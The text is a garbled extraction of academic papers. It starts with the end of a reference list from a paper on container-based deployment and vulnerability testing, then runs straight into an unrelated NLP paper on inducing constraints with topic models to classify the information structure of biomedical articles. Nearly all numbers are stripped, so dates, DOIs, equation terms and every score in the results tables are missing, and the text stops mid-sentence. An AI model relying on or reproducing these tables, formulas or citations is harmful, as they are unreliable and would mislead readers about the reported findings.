https://bitbucket.org/jomis/smartbrix/downloads/smartbrix_evaluation_results.zip http://dx.doi.org/ . /peerj-cs. gamma e, helm r, johnson r, vlissides j. . design patterns: elements of reusable object-oriented software. boston: addison-wesley professional. gerlach w, tang w, keegan k, harrison t, wilke a, bischof j, dsouza m, devoid s, murphy-olson d, desai n, meyer f. . skyport—container-based execution environment management for multi-cloud scientific workflows. in: proceedings of the international workshop on data-intensive computing in the clouds. 
piscataway: ieee, – . humble j, farley d. . continuous delivery: reliable software releases through build, test, and deployment automation. st edition. boston: addison-wesley professional. hummer w, rosenberg f, oliveira f, eilam t. . testing idempotence for infrastructure as code. lecture notes in computer science, vol. . berlin heidelberg: springer, – . hüttermann m. . devops for developers. new york: apress. inzinger c, nastic s, sehic s, vögler m, li f, dustdar s. . madcat—a methodol- ogy for architecture and deployment of cloud application topologies. in: proc. intl. symp. on service-oriented system engineering. piscataway: ieee, – . lebeau f, legeard b, peureux f, vernotte a. . model-based vulnerability testing for web applications. in: proceedings of the international conference on software testing, verification and validation workshops. piscataway: ieee, – . li r, abendroth d, lin x, guo y, baek h-w, eide e, ricci r, van der merwe j. . potassium: penetration testing as a service. in: proceedings of the symposium on cloud computing. new york: acm, – . li w, kanso a, gherbi a. . leveraging linux containers to achieve high availability for cloud services. in: proceedings of the international conference on cloud engineering. piscataway: ieee, – . li h-c, liang p-h, yang j-m, chen s-j. . analysis on cloud-based security vul- nerability assessment. in: proceedings of the international conference on e-business engineering. piscataway: ieee, – . lowis l, accorsi r. . on a classification approach for soa vulnerabilities. in: proceedings of the international computer software and applications conference. piscataway: ieee, – . lowis l, accorsi r. . vulnerability analysis in soa-based business processes. ieee transactions on services computing ( ): – doi . /tsc. . . nelson-smith s. . test-driven infrastructure with chef . nd edition. north se- bastopol: o’reilly media. newman s. . building microservices. north sebastopol: o’reilly media, inc. schleicher jm, vögler m, inzinger c, dustdar s. a. smart fabric-an infrastructure- agnostic artifact topology deployment framework. in: proceedings of the international conference on mobile services. piscataway: ieee, – . schleicher jm, vögler m, inzinger c, dustdar s. b. towards the internet of cities: a research roadmap for next-generation smart cities. in: proceedings of the international workshop on understanding the city with urban informatics. new york: acm, – . schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tsc. . http://dx.doi.org/ . /peerj-cs. schleicher jm, vögler m, inzinger c, hummer w, dustdar s. c. nomads— enabling distributed analytical service environments for the smart city domain. in: proceedings of the international conference on web services. piscataway: ieee, – . shahriar h, zulkernine m. . automatic testing of program security vulnerabilities. in: proceedings of the international computer software and applications conference, vol. . piscataway: ieee, – . soltesz s, pötzl h, fiuczynski me, bavier a, peterson l. . container-based oper- ating system virtualization: a scalable, high-performance alternative to hypervisors. sigops operating systems review ( ): – doi . / . . tosatto a, ruiu p, attanasio a. . container-based orchestration in cloud: state of the art and challenges. in: proceedings of the international conference on complex, intelligent, and software intensive systems. piscataway: ieee, – . vögler m, schleicher jm, inzinger c, dustdar s. a. 
diane—dynamic iot application deployment. in: proceedings of the international conference on mobile services. piscataway: ieee, – . vögler m, schleicher jm, inzinger c, nastic s, sehic s, dustdar s. b. leonore— large-scale provisioning of resource-constrained iot deployments. in: proceedings of the international symposium on service-oriented system engineering. piscataway: ieee, – . wettinger j, breitenbücher u, leymann f. . compensation-based vs. convergent deployment automation for services operated in the cloud. lecture notes in computer science : – doi . / - - - - _ . yu w, aravind d, supthaweesuk p. . software vulnerability analysis for web services software systems. in: proceedings of the symposium on computers and communications. piscataway: ieee, – . zhang d, liu d, csallner c, kung d, lei y. . a distributed framework for demand-driven software vulnerability detection. journal of systems and software : – doi . /j.jss. . . . schleicher et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /j.jss. . . http://dx.doi.org/ . /peerj-cs. unsupervised declarative knowledge induction for constraint-based learning of information structure in scientific documents yufan guo dtal university of cambridge, uk yg @cam.ac.uk roi reichart technion - iit haifa, israel roiri@ie.technion.ac.il anna korhonen dtal university of cambridge, uk alk @cam.ac.uk abstract inferring the information structure of scien- tific documents is useful for many nlp appli- cations. existing approaches to this task re- quire substantial human effort. we propose a framework for constraint learning that re- duces human involvement considerably. our model uses topic models to identify latent top- ics and their key linguistic features in input documents, induces constraints from this in- formation and maps sentences to their domi- nant information structure categories through a constrained unsupervised model. when the induced constraints are combined with a fully unsupervised model, the resulting model challenges existing lightly supervised feature- based models as well as unsupervised mod- els that use manually constructed declarative knowledge. our results demonstrate that use- ful declarative knowledge can be learned from data with very limited human involvement. introduction automatic analysis of scientific text can help scien- tists find information from literature faster, saving valuable research time. in this paper we focus on the analysis of the information structure (is) of sci- entific articles where the aim is to assign each unit of an article (typically a sentence) into a category that represents the information type it conveys. by infor- mation structure we refer to a particular type of dis- course structure that focuses on the functional role of a unit in the discourse (webber et al., ). for instance, in the scientific literature, the functional role of a sentence could be the background or moti- vation of the research, the methods used, the experi- ments carried out, the observations on the results, or the author’s conclusions. readers of scientific literature find information in is-annotated articles much faster than in unanno- tated articles (guo et al., b). 
argumentative zoning (az) – an information structure scheme that has been applied successfully to many scientific domains (teufel et al., ) – has improved tasks such as summarization and information extraction and retrieval (teufel and moens, ; tbahriti et al., ; ruch et al., ; liakata et al., ; contractor et al., ). existing approaches to information structure analysis require substantial human effort. most use feature-based machine learning, such as svms and crfs (e.g. (teufel and moens, ; lin et al., ; hirohata et al., ; shatkay et al., ; guo et al., ; liakata et al., )), which rely on thousands of manually annotated training sentences. also the performance of such methods is rather limited: liakata et al. ( ) reported per-class f-scores ranging from . to . in the biochemistry and chemistry domains, and guo et al. ( a) reported substantially lower numbers for the challenging introduction and discussion sections in the biomedical domain. guo et al. ( a) recently applied the generalized expectation (ge) criterion (mann and mccallum, ) to information structure analysis using expert knowledge in the form of discourse and lexical constraints. their model produces promising results, especially for sections and categories where feature-based models perform poorly. even the unsupervised version, which uses constraints under a maximum-entropy criterion without any feature-based model, outperforms fully-supervised feature-based models in detecting challenging low-frequency categories across sections. however, this approach still requires substantial human effort in constraint generation. particularly, lexical constraints were constructed by creating a detailed word list for each information structure category. for example, words such as "assay" were carefully selected and used as a strong indicator of the "method" category: p(method|assay) was constrained to be high (above . ). such a constraint (developed for the biomedical domain) may not be applicable to a new domain (e.g. computer science) with a different vocabulary and writing style. in fact, most existing works on learning with declarative knowledge rely on manually constructed constraints. little work exists on automatic declarative knowledge induction. a notable exception is (mcclosky and manning, ), which proposed a constraint learning model for timeline extraction. this approach, however, requires human supervision in several forms, including task-specific constraint templates (see section ). we present a novel framework for learning declarative knowledge which requires very limited human involvement. we apply it to information structure analysis, based on two key observations: 1) each information structure category defines a distribution over a section-specific and an article-level set of linguistic features. 2) each sentence in a scientific document, while having a dominant category, may consist of features mostly related to other categories. this flexible view enables us to make use of topic models, which have not proved useful in previous related works (varga et al., ; reichart and korhonen, ). we construct topic models at both the individual section and article level and apply these models to data, identifying latent topics and their key linguistic features.
this information is used to constrain or bias unsupervised models for the task in a straightforward way: we automatically generate constraints for a ge model and a bias term for a graph clustering objective, such that the resulting models assign each of the input sentences to one information structure category. both models provide high quality sentence-based classification, demonstrating the generality of our approach.
table : the az categorization scheme of this paper.
zone: definition
background (bkg): the background of the study
problem (prob): the research problem
method (meth): the methods used
result (res): the results achieved
conclusion (con): the authors' conclusions
connection (cn): work consistent with the current work
difference (diff): work inconsistent with the current work
future work (fut): the potential future direction of the research
we experiment with the az scheme for the analysis of the logical structure, scientific argumentation and intellectual attribution of scientific papers (teufel and moens, ), using an eight-category version of this scheme for biomedicine ((mizuta et al., ; guo et al., b), table ). in evaluation against gold standard annotations, our model rivals the model of guo et al. ( a), which relies on manually constructed constraints, as well as a strong supervised feature-based model trained with up to sentences. in task-based evaluation we measure the usefulness of the induced categories for customized summarization (contractor et al., ) from specific types of information in an article. the az categories induced by our model prove more valuable than those of (guo et al., a) and those in the gold standard. our work demonstrates the great potential of automatically induced declarative knowledge in both improving the performance of information structure analysis and reducing reliance on human supervision. previous work automatic declarative knowledge induction learning with declarative knowledge offers effective means of reducing human supervision and improving performance. this framework augments feature-based models with domain and expert knowledge in the form of, e.g., linear constraints, posterior probabilities and logical formulas (e.g. (chang et al., ; mann and mccallum, ; mann and mccallum, ; ganchev et al., )). it has proven useful for many nlp tasks including unsupervised and semi-supervised pos tagging, parsing (druck et al., ; ganchev et al., ; rush et al., ) and information extraction (chang et al., ; mann and mccallum, ; reichart and korhonen, ; reichart and barzilay, ). however, declarative knowledge is still created in a costly manual process. we propose inducing such knowledge directly from text with minimal human involvement. this idea could be applied to almost any nlp task. we apply it here to information structure analysis of scientific documents. little prior work exists on automatic constraint learning. recently, (mcclosky and manning, ) investigated the approach for timeline extraction. they used a set of gold relations and their temporal spans and applied distant learning to find approximate instances for classifier training. a set of constraint templates specific to temporal learning were also specified. in contrast, we do not use manually specified guidance in constraint learning.
particu- larly, we construct constraints from latent variables (topics in topic modeling) estimated from raw text rather than applying maximum likelihood estimation over observed variables (fluents and temporal ex- pressions) in labeled data. our method is therefore less dependent on human supervision. even more recently, (anzaroot et al., ) presented a super- vised dual-decomposition based method, in the con- text of citation field extraction, which automatically generates large families of constraints and learn their costs with a convex optimization objective during training. our work is unsupervised, as opposed to their model which requires a manually annotated training corpus for constraint learning. information structure analysis various schemes have been proposed for analysing the information structure of scientific documents, in particular the patterns of topics, functions and re- lations at sentence level. existing schemes include argumentative zones (teufel and moens, ; mizuta et al., ; teufel et al., ), discourse structure (burstein et al., ; webber et al., ), qualitative dimensions (shatkay et al., ), scientific claims (blake, ), scientific concepts (liakata et al., ), and information status (mark- ert et al., ), among others. most previous work on automatic analysis of information structure relies on supervised learning (teufel and moens, ; burstein et al., ; mizuta et al., ; shatkay et al., ; guo et al., ; liakata et al., ; markert et al., ). given the prohibitive cost of manual annotation, unsupervised and minimally supervised techniques such as clustering (kiela et al., ) and topic modeling (varga et al., ; ó séaghdha and teufel, ) are highly important. however, the performance of such approaches shows a large room for improvement. our work is specifically aimed at addressing this problem. information structure learning with declar- ative knowledge recently, reichart and korhonen ( ) and guo et al. ( a) developed constrained models that integrate rich linguistic knowledge (e.g. discourse patterns, syntactic features and sentence similarity information) for more reliable unsuper- vised or transductive learning of information cate- gories in scientific abstracts and articles. guo et al. ( a) used detailed lexical constraints developed via human supervision. whether automatically in- duced declarative knowledge can rival such manual constraints is a question we address in this work. while reichart and korhonen ( ) used more general constraints, their most effective discourse constraints were tailored to scientific abstracts and are less relevant to full papers. model we introduce a topic-model based approach to declarative knowledge (dk) acquisition and describe how this knowledge can be applied to two unsuper- vised models for our task. section . describes how topic models are used to induce topics that serve as the main building blocks of our dk. section . ex- plains how the resulting topics and their key features are transformed into dk – constraints in the general- ized expectation (ge) model and bias functions in a graph clustering algorithm. . inducing information structure categories with latent dirichlet allocation latent dirichlet allocation (lda) lda is a gener- ative process widely used for discovering latent top- ics in text documents (blei et al., ). it assumes the following generative process for each document: . choose θi ∼ dirichlet(α), i ∈{ , ...,m} . choose φk ∼ dirichlet(β),k ∈{ , ...,k} . 
for each word wij,j ∈{ , ...,ni} (a) choose a topic zij ∼ multinomial(θi) (b) choose a word wij ∼ multinomial(φzij), where θi is the distribution of topics in document i, φk is the distribution of observed features (usually words) for topic k, zij is the topic of the j-th word in document i, and wij is the j-th word in document i. a number of inference techniques have been pro- posed for the parameter estimation of this process, e.g. variational bayes (blei et al., ) and gibbs sampling (griffiths and steyvers, ) which we use in this work. topics and information structure categories a key challenge in the application of lda to in- formation structure analysis is defining the observed features generated by the model. topics are usually defined to be distributions over all the words in a document, but in our task this can lead to undesired topics. consider, for example, the following sen- tences from the introduction section of an article: - first, exposure to bd-diol via inhalation causes an increase in hprt mutation frequency in both mice and rats ( ). - third, bd-diol is a precursor to mi, an important urinary metabolite in humans exposed to bd ( ). in a word-based topic model we can expect that most of the content words in these sentences will be gen- erated by a single topic that can be titled as “bd- diol”, or by two different topics related to “mice rat” and “human”. however, information structure categories should reflect the role of the sentence in e.g. the discourse or argument structure of the pa- per. for example, given the az scheme both sen- tences should belong to the background (bkg) cate- gory (table ). the same requirement applies to the topics induced by the topic models. features in applying lda to az, we define top- ics as distributions over: (a) words of particular syn- tactic categories; (b) syntactic (pos tag) patterns; and (c) discourse markers (citations, tables and fig- ures). below we list our features, among which pro- noun, conjunction, adjective and adverb are novel and the rest are adapted from (guo et al., a): citation a single feature that aggregates together the various citation formats in scientific articles (e.g. [ ] or (tudek )). table, figure a single feature representing any ref- erences to tables or figures in a sentence. verb verbs are central to the meaning of a sentence. each of the base forms of the verbs in the corpus is a unique feature. pronoun personal (e.g. “we”) and possessive pro- nouns (e.g. “our”) and the following adjectives (as in e.g. “our recent” or “our previous”) may indicate the ownership of the work (e.g. the author’s own vs. other people’s work), which is important for our task. each of the above words or word combinations is a unique feature. conjunction conjunctions indicate the relationship between different sentences in text. we consider two types of conjunctions: ( ) coordinating conjunctions (indicated by the pos tag “cc” in the output of the c&c pos tagger); and ( ) saturated clausal modi- fiers (indicated by the pos tag “in” and the corre- sponding grammatical relation “cmod” in the output of the c&c parser). each word that forms a con- junction according to this definition is a unique fea- ture. adjective and adverb adjectives provide descrip- tive information about objects, while adverbs may change or qualify the meaning of verbs or adjectives. each adverb and adjective that appears in more than articles in the corpus is a unique feature. 
modal, tense, voice previous work has demonstrated a strong correlation between tense, voice, modals and information categories (e.g. (guo et al., a; liakata et al., )). these features are indicated by the part-of-speech (pos) tag of verbs. for example, the phrase "may have been investigated" is represented as "may-md have-vbz be-vbn verb-vbn". as a pre-processing step, each sentence in the input corpus was represented with the list of features it consists of. consider, for example, the following sentence from a discussion section in our data-set:
- in a previous preliminary study we reported that the results of a limited proof of concept human clinical trial using sulindac ( - %) and hydrogen peroxide ( %) gels applied daily for three weeks on actinic keratoses (ak) involving the upper extremities [ ].
before running the discussion section topic model (see below for the features considered by this model), this sentence is converted to the following representation:
- [cite] previous preliminary we limited
the topic models we construct are assumed to generate these features rather than bag-of-words. (we collapsed adverbs ending with -ly into the corresponding adjectives to reduce data sparsity. verbs were spared the frequency cut-off because rarely occurring verbs are likely to correspond to domain-specific actions that are probably indicative of the meth category.)
table : the features used in the article-level and the section-specific topic models in this paper.
model: features
article: verb, table, figure, modal, tense, voice
introduction: citation, pronoun, verb, modal, tense, voice
discussion: citation, pronoun, conjunction, adjective, adverb
topic models construction looking at the categories in table it is easy to see that different combinations of the features in topic model generation will be relevant for different category distinctions. for example, personal pronouns are particularly relevant for distinguishing between categories related to current vs. previous works. some distinctions between categories are, in turn, more relevant for some sections than for others. for example, the distinction between the background (bkg) and the definition of the research problem (prob) is important for the introduction section, but less important for the results section. similarly, the distinction between conclusions (con) and difference from previous work (diff) is more relevant for the discussion section than for other sections. we therefore constructed two types of topic models: section-specific and article-level models, reasoning that some distinctions apply globally at the article level while some apply more locally at the section level. section-specific models were constructed for the introduction section and for the discussion section. table presents the features that are used with each topic model. a key issue in the application of topic models to our task is the definition of the unit of text for which θi, the distribution over topics, is drawn from the dirichlet distribution (step 1 of the algorithm). this choice is data dependent, and the standard choice is the document level. however, for scientific articles the paragraph level is a better choice, because a paragraph contains only a small subset of information structure categories while in a full article categories are more evenly distributed. we therefore adopted the paragraph as our basic unit of text.
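under this setup, fitting a paragraph-level topic model amounts to running lda over feature lists rather than raw words. a minimal sketch using gensim is given below; the choice of gensim (whose variational implementation differs from the gibbs sampling used in the paper), the number of topics, the hyperparameters and the toy paragraphs are all our own assumptions for illustration only.

from gensim import corpora, models

# each paragraph is a list of extracted features, e.g. for the discussion
# section model: citations, pronouns, conjunctions, adjectives and adverbs
paragraphs = [
    ["[cite]", "previous", "preliminary", "we", "limited"],
    ["however", "significant", "our", "consistent"],
]

dictionary = corpora.Dictionary(paragraphs)
bows = [dictionary.doc2bow(p) for p in paragraphs]

# k topics with symmetric dirichlet priors; all values here are placeholders
lda = models.LdaModel(bows, id2word=dictionary, num_topics=8,
                      alpha="symmetric", eta="auto", passes=10,
                      random_state=0)

# the n highest-probability features per topic serve as that topic's key
# features when inducing the constraints and bias terms described next
top_features = {k: [w for w, _ in lda.show_topic(k, topn=5)]
                for k in range(lda.num_topics)}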
the section-level and the article-level models are applied to the collection of paragraphs in the specific section across the test set articles or in the entire set of test articles, respectively. (the methods section is less suitable for a section-level topic model, as the large majority of its sentences belong to its dominant category (meth); preliminary experiments with section-level topic models for the methods and results sections did not lead to improved performance.)

declarative knowledge induction

most sentence-based information structure analysis approaches associate each sentence with a unique category. however, since the map assignment of topics to features associates each sentence with multiple topics, we cannot directly interpret the resulting topics as categories of input sentences. (our preliminary experiments demonstrated that assigning the learned topics to the test sentences performs poorly.) in this section we present two methods for incorporating the information conveyed by the topic models (see the previous section) in unsupervised models. the first method biases a graph clustering algorithm while the second generates constraints that can be used with a ge criterion.

graph clustering: we use the graph clustering objective of dhillon et al. ( ), which can be optimized efficiently, without eigenvalue calculations:

$$\max_{\tilde{Y}} \; \mathrm{trace}\big(\tilde{Y}^{T} W^{-1/2} A W^{-1/2} \tilde{Y}\big)$$

where $A$ is a similarity matrix, $W$ is a diagonal matrix of the weight of each cluster, and $\tilde{Y}$ is an orthonormal matrix indicating cluster membership, which is proportional to the square root of $W$. to make use of topics to bias the graph clustering towards the desired solution, we define the similarity matrix $A$, whose $(i,j)$-th entry corresponds to the $i$-th and $j$-th test set sentences, as follows:

$$A(i,j) = f(S_i, S_j) + \gamma \, g(S_i, S_j, T)$$

where $S_i$ = {all the features extracted from sentence $i$}, $T = \{T_k \mid T_k = \{\text{top } n \text{ features associated with topic } k\}\}$, $f(S_i, S_j) = |S_i \cap S_j|$, and $g(S_i, S_j, T) = 1$ if $\exists x \in S_i \, \exists y \in S_j \, \exists k :\ x \in T_k \wedge y \in T_k$, and $0$ otherwise, where $T_k$ consists of the $n$ features that are assigned the maximum probability according to the $k$-th topic. under this formulation, the topic model term $g(\cdot)$ is the indicator of whether two sentences share features associated with the same topic. if this is true, the algorithm is encouraged to assign these sentences to the same cluster.

generalized expectation: a generalized expectation (ge) criterion is a term in an objective function that assigns a score to model expectations (mann and mccallum, ; druck et al., ; bellare et al., ). given a score function $G(\cdot)$, a discriminative model $p_\lambda(y|x)$, a vector of feature functions $f^*(\cdot)$, and an empirical distribution $\tilde{p}(x)$, the value of a ge criterion is:

$$G\big(E_{\tilde{p}(x)}\big[E_{p_\lambda(y|x)}[f^*(x,y)]\big]\big)$$

a popular choice of $G(\cdot)$ is a measure of distance (e.g. the $l_2$ norm) between model and reference expectations. the feature functions $f^*(\cdot)$ and the reference expectations of $f^*(\cdot)$ are traditionally specified by experts, which provides a way to integrate declarative knowledge into machine learning. consider a maximum entropy (maxent) model $p_\lambda(y|x) = \frac{1}{Z_\lambda(x)} \exp(\lambda \cdot f(x,y))$, where $f(\cdot)$ is a vector of feature functions, $\lambda$ the feature weights, and $Z_\lambda$ the partition function. the following objective function can be used for training maxent with ge criteria on unlabeled data:

$$\max_{\lambda} \; -G\big(E_{\tilde{p}(x)}\big[E_{p_\lambda(y|x)}[f^*(x,y)]\big]\big) - \sum_j \frac{\lambda_j^2}{2\sigma^2}$$

where the second term is a zero-mean $\sigma^2$-variance gaussian prior on the parameters.
let the $k$-th feature function $f^*_k(\cdot)$ be an indicator function:

$$f^*_k(x,y) = \mathbb{1}_{\{x_{i_k}=1 \,\wedge\, y=y_k\}}(x,y)$$

where $x_{i_k}$ is the $i_k$-th element/feature in the feature vector $x$. the model expectation of $f^*_k(\cdot)$ becomes:

$$E_{\tilde{p}(x)}\big[E_{p_\lambda(y|x)}[f^*_k(x,y)]\big] = \tilde{p}(x_{i_k}=1)\, p_\lambda(y_k \mid x_{i_k}=1)$$

to calculate $G(\cdot)$, a reference expectation of $f^*_k(\cdot)$ can be obtained after specifying the upper and lower limits of $p(y_k \mid x_{i_k}=1)$:

$$l_k \leq p(y_k \mid x_{i_k}=1) \leq u_k$$

constraints of this type, for example a lower and upper bound on $p(\textsc{con} \mid \text{suggest})$, have been successfully applied to ge-based information structure analysis by guo et al. ( a). here we build on their framework; our contribution is the automatic induction of such constraints by topic modeling.

the association between features and topics can be transformed into constraints as follows. let $W_z$ be the set of top $n$ key features associated with topic $z$, that is, the $n$ features that are assigned the maximum probability according to the topic. we compute the following topic-specific feature sets: $A_z = \{w \mid w \in W_z \wedge \forall t \neq z:\ w \notin W_t\}$, the set of features associated with topic $z$ but not with any of the other topics; and $B_z = \bigcup_{t \neq z} W_t$, the set of features associated with at least one topic other than $z$. for every topic-feature pair $(z_k, w_k)$ we therefore write the following constraint:

$$l_k \leq p(z_k \mid w_k=1) \leq u_k$$

we set the probability range for the $k$-th pair as follows: if $w_k \in A_{z_k}$ then $l_k$ is set to a value close to $1$ and $u_k = 1$; if $w_k \in B_{z_k}$ then $l_k = 0$ and $u_k$ is set to a value close to $0$; in any other case $l_k = 0$ and $u_k = 1$. the values of $l_k$ and $u_k$ were selected such that they reflect the strong association between the key features and their topics. our basic reasoning is that if a sentence is represented by one of the key unique features of a given topic, it is highly likely to be associated with that topic. likewise, a sentence is unlikely to be associated with the topic of interest if it has a key feature of any other topic.

[table: distribution of sentences (shown in percentages) in articles and individual sections in the az-annotated corpus; the total number of sentences in each section appears in parentheses below the section name. columns: bkg, prob, meth, res, con, cn, diff, fut; rows: article, introduction, methods, results, discussion.]

summary of contribution

learning with declarative knowledge is an active recent research avenue in the nlp community. in this framework feature-based models are augmented with domain and expert knowledge, encoded most often by constraints of various types. the human effort involved with this framework is the manual specification of the declarative knowledge. this requires deep understanding of the domain and task in question. the resulting constraints typically specify detailed associations between lexical, grammatical and discourse elements and the information to be learned (see, e.g., the constraint tables of guo et al. ( a) and chang et al. ( )). our key contribution is the automatic induction of declarative knowledge that can be easily integrated into unsupervised models in the form of constraints and bias functions. our model requires minimal domain and task knowledge. we do not specify lists of words or discourse markers (as in guo et al. ( a)) but, instead, our model automatically associates latent variables both with linguistic features, taken from a very broad and general feature set (e.g. all the words that belong to a given set of pos tags), and with sentences in the input text.
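As a concrete illustration of this induction, the sketch below turns per-topic feature distributions (for example, the phi returned by the sampler shown earlier) into GE-style probability-range constraints via the sets A_z and B_z, and into the topic-biased similarity function used by the graph clustering objective. It is a minimal sketch under stated assumptions: the bound values `lo` and `hi`, the number of key features `n`, and the weight `gamma` are illustrative placeholders, not the values used in the paper.

```python
def top_features(phi_k, n):
    """The n features with maximum probability under one topic's distribution."""
    return set(sorted(phi_k, key=phi_k.get, reverse=True)[:n])

def induce_declarative_knowledge(phi, n=20, lo=0.9, hi=0.1, gamma=1.0):
    """Turn induced topics into GE constraints and a biased similarity function."""
    W = [top_features(phi_k, n) for phi_k in phi]        # W_z: key features of topic z
    constraints = {}
    for z, Wz in enumerate(W):
        others = set().union(*(W[t] for t in range(len(W)) if t != z))  # B_z
        for w in Wz:
            if w not in others:                          # w in A_z: unique to topic z
                constraints[(z, w)] = (lo, 1.0)          # p(z | w) should be high
            else:                                        # w in B_z: shared with another topic
                constraints[(z, w)] = (0.0, hi)          # p(z | w) should be low
    # All remaining topic-feature pairs are left unconstrained, i.e. bounds (0, 1).

    def similarity(S_i, S_j):
        """A(i, j) = f + gamma * g for two sentences given as sets of features."""
        f = len(S_i & S_j)
        g = 1.0 if any(S_i & Wz and S_j & Wz for Wz in W) else 0.0
        return f + gamma * g

    return constraints, similarity
```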
in the next sec- tion we present our experiments which demonstrate the usefulness of this declarative knowledge. experiments data and models we used the full paper cor- pus earlier employed in (guo et al., a) which includes annotated sentences (with reported inter-annotator agreement: κ = . ) from biomedical journal articles from the cancer risk as- sessment domain. one third of this corpus was saved for a development set on which our model was de- signed and its hyperparameters were tuned (see be- low). the corpus is annotated according to the argu- mentative zoning (az) scheme (teufel and moens, ; mizuta et al., ) described in table . ta- ble shows the distribution of az categories and the total number of sentences in each individual section. since section names vary across articles, we grouped similar sections before calculating the statistics (e.g. materials and methods sections were grouped under method). the table demonstrates that although there is a dominant category in each section (e.g. bkg in introduction), up to . % of the sentences in each section fall into other categories. feature extraction we used the c&c pos tag- ger and parser trained on biomedical literature (cur- ran et al., ; rimell and clark, ) in the fea- ture extraction process. lemmatization was done with morpha (minnen et al., ). baselines we compared our models (topicgc and topicge) against the following baselines: (a) an unconstrained unsupervised model – the unbiased version of the graph clustering we use for topicgc (i.e. where g(·) is omitted, gc); (b) the unsuper- vised constrained ge method of (guo et al., a) where the constraints were created by experts (ex- pertge); (c) supervised unconstrained maximum entropy models, each trained to predict categories in a particular section using sentences from that section, as in the lightly supervised case in (guo et al., a) (maxent); and (d) a baseline that assigns all the sentences in a given section to the most fre- quent gold-standard category of that section (table ). this baseline emulates the use of section names for information structure classification. our constraints, which we use in the topicge and topicgc models, are based on topics that are learned on the test corpus. while having access to the raw test text at training time is a standard as- sumption in many unsupervised nlp works (e.g. (klein and manning, ; goldwater and grif- fiths, ; lang and lapata, )), it is impor- tant to quantify the extent to which our method de- pends on its access to the test set. we therefore con- structed the topicge* model which is identical to topicge except that the topics are learned from an- other collection of biomedical articles contain- ing sentences. like our test set, these articles are from the cancer risk assessment domain - all of them were published in the toxicol. sci. journal in the years - and were retrieved using the pubmed search engine with the key words “cancer risk assessment”. there is no overlap between this new dataset and our test set (guo et al., a). models and parameters for graph clustering, we used the graclus software (dhillon et al., ). for ge and maxent, we used the mallet software (mccallum, ). the γ parameter in the graph clustering was set to using the development data. several values of this parameter in the range of [ , ] yielded very similar performance. the number of key features considered for each topic, n, was set to , and for the article, introduc- tion section, and discussion section topic models, respectively. 
this difference reflects the number of feature types (table ) and the text volume (table ) of the respective models. evaluation we evaluated the overall accuracy as well as the category-level precision, recall and f- score for each section. topicgc, topicge, top- icge* and the baseline gc methods are unsuper- introduction method result discussion gc tgc tge tge* ege mfc gc tgc tge tge* ege mfc gc tgc tge tge* ege mfc gc tgc tge tge* ege mfc f bkg . . . . . . - - - - . - - - - - . - . . . . . - prob . . . . . - - - - - . - - - - - . - - - - - . - meth - . . . . - . . . . . . . - . . . - - - - - . - res - - - - . - - - - - . - . . . . . . - - - - . - con - . . . . - - - - - - - . . . . . - . . . . . . cn - - - - - - - - - - - - - - - - . - - . . . . - diff - - - - - - - - - - - - - - - - - - - - - - . - fut - - - - - - - - - - - - - - - - - - - - - - . - acc. . . . . . . . . . . . . . . . . . . . . . . . . table : performance (class based f -score and overall accuracy (acc.)) of unbiased graph clustering (gc), graph clustering with declarative knowledge learned from topic modeling (topicgc model, tgc column), generalized expectation using constraints learned from topic modeling (topicge, tge) and the same model where constraints are learned using an external set of articles (topicge*, tge*), ge with constraints created by experts (expertge, ege - a replication of (guo et al., a)) and the most frequent gold standard category of the section (mfc) vised and therefore induce unlabeled categories. to evaluate their output against the gold standard az annotation we first apply a standard greedy many- to-one mapping (naming) scheme in which each in- duced category is mapped to the gold category that shares the highest number of elements (sentence) with it (reichart and rappoport, ). the to- tal number of induced topics was with each topic model inducing three topics. for light supervision, a ten-fold cross-validation scheme was applied. in addition, we compare the quality of the auto- matically induced and manually constructed declar- ative knowledge in the context of customized sum- marization (contractor et al., ) where sum- maries of specific types of information in an article are to be generated (we focused on the article’s con- clusions). while an intuitive solution would be to summarize the discussion section of a paper, only . % of its sentences belong to the gold standard conclusion category (table ). for our experiment, we first generated five sets of sentences. the first four sets consist of the ar- ticle sentences annotated with the con category ac- cording to: topicge or topicgc or expertge or the gold standard annotation. the fifth set is the discus- sion section. we then used microsoft autosumma- rize (microsoft, ) to select sentences from each of the five sets such that the number of words in each summary amounts for % of the words in the input. the number of gold standard az categories is . however, we wanted each of our topic models to induce the same number of topics in order to reduce the number of parameters to the required minimum. for evaluation, we asked an expert to summarize the conclusions of each article in the corpus. we then evaluated the five summaries against the gold- standard summaries written by the expert in terms of various rouge scores (lin, ). results we report here the results for our constrained unsu- pervised models compared to the baselines. 
we start with quantitative evaluation and continue with qual- itative demonstration of the topics learned by the topic models and their key features which provide the substance for the constraints and bias functions used in our information structure models. unsupervised learning results table presents the performance of the four main unsupervised learning models discussed in this paper: gc, top- icgc, topicge, and expertge of (guo et al., a). our models (topicgc and topicge) out- perform the expertge when considering category based f-score for the dominant categories of each section. expertge is most useful in identifying the less frequent categories of each section (table ), which is in line with (guo et al., a). the overall sentence-based accuracy of topicge is significantly higher than that of expertge for all four sections (bottom line of the table). furthermore, for all four sections it is one of our models (topicgc or top- icge) that provides the best result under this mea- sure, among the unsupervised models. the table further provides a comparison of the un- supervised models to the mfc baseline which as- signs all the sentences of a section to its most fre- introduction method result discussion topicge light topicge light topicge light topicge light p r f p r f p r f p r f p r f p r f p r f p r f bkg . . . . . . - - - - - - - - - - - - . . . . . . prob . . . . . . - - - - - - - - - . . . - - - - - - meth . . . . . . . . . . . . . . . . - - - - - - res - - - - - - - - - - - - . . . . . . - - - - - - con . . . . . . - - - - - - . . . . . . . . . . . . cn - - - - - - - - - - - - - - - - - - . . . . . . diff - - - - - - - - - - - - - - - - - - - - - - - - fut - - - - - - - - - - - - - - - - - - - - - - - - acc. . . . . . . . . table : performance (class based precision, recall and f-score as well as overall accuracy (acc.)) of the topicge model and of an unconstrained maxent model trained with light supervision (total of sentences - training sentences for each section-level model). the same pattern of results holds when the maxent is trained with up to sentences ( sentences for each section-level model). topicge topicgc expertge section gold r p f r p f r p f r p f r p f rouge- . . . . . . . . . . . . . . . rouge- . . . . . . . . . . . . . . . rouge-l . . . . . . . . . . . . , . . table : rouge scores of zone (topicge, topicgc, expertge or gold standard) and discussion section based sum- maries. topicge provides the best summaries. topicgc outperforms expertge and the discussion section systems and in two measures the gold categorization based system as well. result patterns with rouge( , ,w- . , s* and su*) are very similar to those of the table. the differences between topicge and expertge are statistically significant using t-test with p < . . the 